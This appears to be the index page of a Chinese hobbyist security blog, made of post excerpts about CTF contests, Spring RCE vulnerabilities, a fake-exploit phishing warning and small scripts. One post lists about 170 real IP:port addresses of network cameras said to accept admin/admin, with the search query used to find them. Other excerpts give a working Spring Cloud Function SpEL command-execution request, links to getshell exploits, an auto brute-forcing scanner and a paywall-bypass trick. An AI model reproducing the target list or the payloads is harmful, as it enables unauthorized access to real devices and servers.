今天的投稿是来自CTF比赛方面的
少年自有凌云志,网安更待少年时,这句话出自ccs极客少年比赛。近年来,网络安全形势日益严峻复杂,特别是电信网络诈骗犯罪已呈高发态势,网络安全教育亟待从青少年抓起。所以就有了今天的主角一位16岁热爱网络安全的男高中生 叶子或者0x11或者A1ph@ ,可能看到这个师傅们很疑惑啊,谁会一下子用三个id?但是没错我们的主角会,(可能是怕py的时候被认出来)看到这,师傅们应该明白了今天的主题,由于他的id过多,所以下面统称py佬,上图看看别人对他的评价
那么这一波我也是将他本该的称号物归原主,自然以佬字辈尊称肯定是在某方面比较权威和精通的人,所以接下来给师傅们讲讲他是如何在py上获得佬字尊称的
那么又要回到开头所提到的ccs极客少年,是的这是青少年的ctf比赛,那么自然少不了我们的py佬,我们的py佬在比赛开始前就建立了专门的py小群,在比赛中稳定发挥,靠着熟练的人脉搜题法,成功拿下了比赛的第三名,可喜可贺,可是偏偏在这时被人举报了,真是老天无眼啊,我都替他可惜,又错失了装逼的好时机,现在来看一下案发过程,顺带分析一下他的py姿势
以一句“在吗”简单开头,顺达尊称一句师傅,让人放下防备
在得到他人回应以后以一招开门见山直逼主题,可惜碰壁
看来我们的py佬也是有学习之心的,在py的同时不忘寻求解题思路
Py佬发现直接要flag好像行不通,于是开始阿谀奉承,膜拜大佬,嘲讽自己是废物,其实他不知道,他在py方面的成就远超他人
最后我们可怜的py佬没有如愿拿到flag还惨遭举报
最终成绩作废,
我们的py佬在得知成绩作废以后心灰意冷
可谁知,在两个月以后他又卷土重来,参加了弱口令实验室招新
这一波他直接将别的师傅当做flag提款机疯狂榨干,我们也发现py佬真的名不虚传,只会py,栈溢出都不会,
可怜的提款机还蒙在鼓里
接下来我们的py佬发现有人愿意免费做赛题,狂喜!
这时他排到了第5,但他没有发挥全部实力
可以看出py佬的野心很大
这时候我们的py佬登顶榜一、恭喜啊,超常发挥了
不忘骂一下出题人
这里可见py佬基础之差,但没事,因为他会py
可悲啊,最后还是让主办方知道了,无缘第一,哎,可惜啊
Read More ~
信息收集脑图
原创,请勿转发泄露
Read More ~
玩一波国外摄像头漏洞-174个弱口令
本来想挖任意用户添加,然后发现无用,简单看了一下fofa201个目标,弱口令还是挺多的
用户密码admin/admin
fofa语句 app="Finetree-5MP-Network-Camera"
py脚本 https://github.com/ChinaRan0/Finetree-5MP
'''
75.99.238.164:8087
188.115.19.229:50001
47.23.144.92:8081
75.99.238.164:8087
188.115.19.229:50001
47.23.144.92:8081
173.220.221.246:8082
47.23.163.196:8088
173.220.245.75:8082
96.56.55.234:8084
108.58.221.156:8082
108.162.59.21:8081
108.58.221.156:8086
173.220.221.246:8088
75.99.230.14:8090
47.22.158.218:8083
173.220.245.75:8090
47.23.145.172:8083
75.99.228.61:8085
47.22.158.218:8082
75.99.238.165:8090
75.99.225.156:8081
47.23.163.196:8089
47.22.138.156:8082
47.23.136.211:8082
75.99.225.156:8089
75.99.230.14:8089
75.99.238.165:8089
173.220.245.75:8089
75.99.225.156:8087
47.23.163.196:8090
75.99.228.61:8087
108.162.59.21:8089
108.58.209.164:8083
108.58.221.156:8083
75.99.229.251:8082
47.23.144.92:8086
75.99.230.14:8082
75.99.229.251:8083
75.99.230.14:8083
75.99.238.165:8083
75.99.238.164:8088
47.23.163.196:8085
75.99.238.165:8088
96.56.77.14:8085
173.220.245.75:8085
47.23.144.92:8085
75.99.229.251:8085
75.99.230.13:8085
108.162.59.21:8085
75.99.238.165:8085
75.99.230.13:8087
75.99.229.251:8087
75.99.238.164:8082
96.56.77.14:8082
75.99.238.165:8087
75.99.230.14:8081
75.99.228.61:8082
108.162.59.21:8083
96.56.55.234:8085
75.99.230.14:8085
47.23.136.211:8085
173.220.221.246:8085
75.99.225.156:8085
108.58.209.164:8082
75.99.238.164:8090
173.220.204.148:8090
47.23.144.92:8088
75.99.225.156:8082
47.23.145.172:8088
75.99.229.251:8090
75.99.230.13:8088
75.99.230.14:8088
75.99.229.251:8088
47.22.138.156:8081
108.58.221.156:8088
108.58.221.156:8089
47.23.144.92:8087
173.220.245.75:8086
108.58.221.156:8090
47.22.158.218:8085
108.58.221.156:8085
47.22.138.156:8085
75.99.228.61:8086
75.99.228.61:8088
75.99.225.156:8088
47.22.138.156:8090
47.22.158.218:8081
47.23.136.211:8086
173.220.221.246:8086
75.99.230.13:8086
75.99.230.14:8086
75.99.229.251:8086
75.99.238.164:8081
75.99.238.165:8081
47.23.145.172:8086
75.99.225.156:8090
75.99.225.156:8086
75.99.230.13:8081
47.23.144.92:8084
173.220.245.75:8081
47.22.138.156:8087
75.99.238.165:8086
75.99.238.164:8086
173.220.245.75:8087
96.56.77.14:8086
75.99.230.14:8087
47.23.136.211:8087
47.22.138.156:8096
173.220.221.246:8087
108.58.221.156:8092
47.23.145.172:8087
75.99.238.165:8082
96.56.77.14:8087
47.22.158.218:8086
75.99.230.14:8093
47.22.138.156:8086
75.99.225.156:8091
173.220.221.246:8081
47.22.138.156:8095
96.56.55.234:8082
75.99.238.165:8091
75.99.238.164:8091
75.99.230.14:8091
173.220.245.75:8088
108.162.59.21:8082
75.99.238.164:8094
47.22.158.218:8087
173.220.245.75:8093
47.23.163.196:8087
75.99.238.165:8093
173.220.204.148:8091
47.22.158.218:8084
173.220.245.75:8091
108.58.209.164:8081
173.220.221.246:8083
173.220.245.76:8091
47.22.138.156:8093
108.58.221.156:8096
108.58.221.156:8091
75.99.230.14:8094
47.23.145.172:8082
75.99.238.164:8092
75.99.238.164:8093
75.99.238.165:8092
108.58.221.156:8084
47.22.138.156:8088
173.220.245.75:8094
173.220.245.75:8083
47.23.163.196:8082
47.22.138.156:8083
47.22.138.156:8094
75.99.238.165:8094
108.58.221.156:8087
75.99.238.164:8095
47.22.138.156:8084
75.99.230.14:8084
75.99.230.13:8084
108.58.221.156:8095
96.57.241.197:8095
173.220.245.75:8084
96.57.241.197:8096
173.220.245.75:8092
108.58.221.156:8093
75.99.238.164:8084
75.99.225.156:8092
47.23.136.211:8084
47.23.163.196:8084
75.99.229.251:8084
173.220.245.76:8092
75.99.225.156:8084
75.99.230.14:8092
75.99.238.165:8084
96.56.77.14:8084
'''
Read More ~
[T-Star高校挑战赛]第六题
2022-04-25 #CTF
下载得到guess
file guess 得到他的格式是word,然后打开,显示隐藏内容,得到:
然后binwalk 出来一张图片
不用想,肯定是隐写
跟据题目guess和已知密钥123456
有一个图片隐写是outguess,
git clone https://github.com/crorvick/outguess
自行下载编译安装
然后解
outguess -k 123456 -r image1.jpg text.txt
然后给他拼接起来得到一个新的地址:
http://175.178.148.197/062ycz7s9458b772e91/webs/
后来我就没继续做,一直没找到flag,后来赛后师傅们写出来文章,md,我差一点就拿到flag了
flag地址:http://175.178.148.197/062ycz7s9458b772e91/webs/index.php?url=http://127.0.0.2/062ycz7s9458b772e91/webs/flag.php
Read More ~
[记录网安生活] Spring Core RCE复现
先搞环境:
sudo docker pull vulfocus/spring-core-rce-2022-03-29
docker run -d -p 8082:8080 --name corerce -it vulfocus/spring-core-rce-2022-03-29
EXP已分享到我的github
https://github.com/ChinaRan0/SpringCoreRCE-EXP-getshell
然后跑起来本机8082端口
运行exp,得到shell
Read More ~
[记录网安生活] Spring Function RCE漏洞紧急修补建议
在应用系统的项目包下新建以下全局类,并保证这个类被 Spring 加载到(推荐在
Controller 所在的包中添加)。完成类添加后,需对项目进行重新编译打包和功能验证测试。
并重新发布项目。
'
import org.springframework.core.annotation.Order;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;
@ControllerAdvice
@Order(10000)
public class Xttblog{
@InitBinder
public void setAllowedFields(WebDataBinder dataBinder) {
String[] claArr = new String[]{"class.", "Class.", ".class.", ".Class."};
dataBinder.setDisallowedFields(claArr);
}
}
'
别问,core的poc还没出来,通了个大宵了。
Read More ~
[记录网安生活] Spring function RCE EXP
复现环境:https://github.com/Pizz33/Spring-Cloud-Function-SpEL
使用idea新增一个spring lnitializr项目,选择与环境匹配的java版本添加spring web和function右侧栏选择maven-package编译jar包编译完成后运行jar包
java -jar demo-0.0.1-SNAPSHOT.jar
POST /functionRouter HTTP/1.1
Host: 127.0.0.1:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc")
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
ran
Read More ~
[记录网安生活] 警惕,有人利用Spring RCE EXP 钓鱼!
假的EXP:
https://github.com/shakeman8/Spring-Core-RCE
该exe文件大小是8M左右,经过证实,该文件为针对安全从业人员的钓鱼攻击:
https://www.virustotal.com/gui/file/45ef7d9efba711af2196fe0d14097293fb0922
根据NowSec师傅的分析,当前样本执行之后的效果如下:执行之后会读取浏览器保存的用户名、密码和对应URL、然后在C:\Users\Public下创建一个tmp文件,下次再执行,就不会上传(应该是判断这个tmp文件是否存在吧),删除tmp文件后再执行可以复现。
最后通过技术手段得到目标ip:84.247.23.128
好玩的来了。
Read More ~
[记录网安生活] SpringRCE 应急相应
博客同步不成功案例【自我反省】
现在的博客是历经了3个月的停更,然后突然想起来,发现我的文件找不到了,所以之前写的博客全都算报废了
1.重新做配置
我一直以为是GitHub Apps设置Key,然后翻到以前的账号才发现是Personal access tokens
2.同步问题:
从网上大神那找到的方案
从文档里找到Gridea,删除.git文件夹,可以意外的获得成功。
自我反省:为什么我用了将近两天才找到解决办法
1.被我自己所知的知识感觉非常自信
2.在网上找解决方法的时候不自信
3.只会用自己所学的知识解决问题,不知道闭关锁国会亡国。
Read More ~
闲来无聊,写了个脚本
FastPenetrationScan
https://github.com/ChinaRan0/FPScan
快速渗透扫描
开发的初心是快速的进行渗透打点 本人技术菜只会用顺序结构来写 因为我用的kali是虚拟机,考虑到性能就不做多线程了 输入ip全自动就行端口扫描,如果扫描到22,3389,则自动进行暴力破解 如果输入域名,进行whois查询,后期加上子域名爆破 再然后,没有了。
用到的环境安装命令
pip install nmap
sudo apt install nmap
sudo apt install hydra
Read More ~
行了,又让老哥骂了!
我之前不是写了个QQ问候脚本嘛,然后老哥今天又骂我了说,‘正是因为有你这样的脚本在,才让这个网络的键盘侠那么猖狂!’
我我我...冤枉啊!
Read More ~
记录,如何免费下载百度文库上的ppt【道客巴巴等通用】
额,,马上要开始培训了,所以说,ppt我是肯定不会做的,有这时间打csgo多号,然后突然想起来百度文库啥都有,直接梭哈了。
用到的工具:稻壳阅读器
目标ppt
然后打开稻壳,输入文档的网址
直接粘贴网址走起,右键另存为
Read More ~
带队了->技能大赛
山东省职业技能大赛,我以指导教师的名义在临沂带队训练,校方答应省一给10w
.然后我带他们新生,发现一个傻逼的事情,这群有几个傻逼二愣子连开机插优盘都不会,我带你ma啊
不管了,先为了工资努力吧!!
冲向市赛!网络搭建省一!
Read More ~
开源【当你在QQ群里遇见了喷子】
https://github.com/ChinaRan0/QQgreetings
调用系统剪切板,实现自动问候群友,
pyperclip pyautogui pymouse 模块自行安装
被狗比老哥给否定了[流泪]
bilibili视频地址
https://www.bilibili.com/video/BV1Mu41197BU
Read More ~